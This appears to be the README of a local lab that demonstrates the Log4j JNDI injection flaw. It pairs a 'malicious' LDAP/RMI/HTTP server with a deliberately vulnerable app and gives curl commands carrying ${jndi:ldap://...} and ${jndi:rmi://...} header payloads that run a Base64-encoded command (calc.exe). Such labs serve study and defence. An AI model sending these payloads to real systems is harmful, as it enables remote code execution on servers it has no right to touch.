Use a vulnerable JDK, for instance JDK 1.8.0_181
The malicious server deploys the following endpoints:
- 1389 LDAP server
- 1099 RMI server
- 8081 HTTP server
./gradlew :malicious-server:bootRun
The vulnerable application deploys one HTTP endpoint at 8082
./gradlew :vulnerable-app:bootRun
Choose a payload that will be executed by the vulnerable app and encode it in Base64. As an example, in order to open the
calculator in Windows: calc.exe
curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}"
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}"
curl --header "X-Vulnerable-Header: ${jndi:dns://}"